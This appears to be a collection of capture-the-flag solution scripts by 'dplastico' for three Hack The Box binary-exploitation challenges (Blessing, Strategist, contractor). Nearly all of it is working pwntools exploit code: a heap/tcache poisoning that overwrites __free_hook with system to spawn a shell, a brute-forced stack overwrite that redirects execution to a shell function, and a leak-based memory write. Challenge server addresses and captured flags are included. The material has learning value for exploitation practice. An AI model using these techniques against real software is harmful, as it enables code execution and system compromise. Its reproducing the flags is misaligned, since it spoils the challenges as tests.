dplastico

Blessing

#!/usr/bin/env python3

from pwn import *

elf = ELF("./blessing_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
libc = elf.libc
#context.log_level = "debug"
gs = '''
b *main + 353
continue
'''

def start():
    if args.REMOTE:
        return remote("83.136.248.131",52424)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

#========= exploit here ===================

leak = int(rcu(b"Please accept this: ", b"\x08 \x08\x08 \x08\x08"),16)
logleak("value location", leak)

size = leak + 1
sla(b"Give me the song's length:", bc(size))

payload = b"BBBBBBBB"

sl(payload)

#========= interactive ====================
r.interactive()
#HTB{3v3ryth1ng_l00k5_345y_w1th_l34k5_9d18ac4b8d55c5fd8673bff7b39ef794}

Strategist

#!/usr/bin/env python3

from pwn import *

elf = ELF("./strategist_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"

libc = elf.libc
gs = '''
continue
'''

def one_gadget(filename, base_addr=0):
	  return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', '-l1', filename]).decode().split(' ')]
#onegadgets = one_gadget('libc.so.6', libc.address)

def start():
    if args.REMOTE:
        return remote("83.136.254.165",37103)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

idx = 0
def create(size, data):
#    global idx
    sl(b"1")
    sla(b">", bc(size))
    sa(b">", data)
    rcu(b">")

def edit(idx, data):
    sl(b"3")
    sla(b">", bc(idx))
    sa(b">", data)
    rcu(b">")

def delete(idx):
    sl(b"4")
    sla(b">", bc(idx))
    rcu(b">")

def leak(idx):
    sl(b"2")
    sla(b">", bc(idx))
    rcu(b"[Sir Alaric]: Plan ")
    leak = u64(rcu(b"]: ", b"\n").split(b"]: ")[1].ljust(8, b"\x00"))
    rcu(b">")
    return leak
#========= exploit here ===================
r.timeout = 1
rcu(b">")

create(0x428, b"leak") #0
create(0x38, b"A"*0x38) #1
create(0x38, b"B") #2
create(0x38, b"C") #3

create(0x18, b"/bin/sh") #4 
delete(0)
create(0x428, b"A") #0?

leak = leak(0)
logleak("libc leak", leak)

libc.address = leak-0x3ebc41
libcbase()

edit(1, b"A"*0x38+p8(0x81))
delete(1)
delete(2)
delete(3)

create(0x78, b"A"*0x40+p64(libc.sym.__free_hook)) #1?
create(0x38, b"X")

create(0x38, p64(libc.sym.system))

delete(4)
#========= interactive ====================
r.interactive()
#HTB{0ld_r3l14bl3_l1bc_st1ll_3x15t5_1ab691e1261885df1a8bed25c7a49008}

contractor

#!/usr/bin/env python3

from pwn import *

elf = ELF("./contractor_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
libc = elf.libc

gs = '''
b *main + 1366
c
'''

def one_gadget(filename, base_addr=0):
	  return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', '-l1', filename]).decode().split(' ')]
#onegadgets = one_gadget('libc.so.6', libc.address)

def start():
    if args.REMOTE:
        return remote("127.0.0.1", 1337)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])


r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

#========= exploit here ===================


attemp = 0

for i in range(16):
    r = process([elf.path])
    #r = remote("94.237.58.202", 33308)
    r.timeout = 0.5
    try:

        name = b"X"*8
        sla(b">", name)
        reason = "Y"*0x8
        sla(b">", reason)
        age = 0x1337
        sla(b">", bc(age))
        #leak
        payload = b"A"*0x10
        sla(b">", payload)
        leak = u64(rcu(b"[Specialty]: AAAAAAAAAAAAAAAA", b"\n").ljust(8, b"\x00"))
        logleak("leak", leak)
        elf.address = leak - 0x1b50
        payload = b"\xf0"*0x18
        payload += p64(0xdeadbeef)
        payload += p8(0x60)
        sla(">", b"4")
        sla(b"at: ",payload)
        #
        sla(b">", b"yes")
        #
        sla(b">", b"4")
        payload = p64(elf.sym.contract)
        #
        sla(b"at: ",payload)
        r.recvuntil(b"lad!\n\n")
        sl(b"ls")
        if b"flag.txt" in r.recv():
            r.interactive()
        else:
            log.failue(f"Fail!")
        
    except KeyboardInterrupt:
        attemp +=1
        log.failure(f"Attemp #{i}")
        r.close()
    except:
        pass

#========= interactive ====================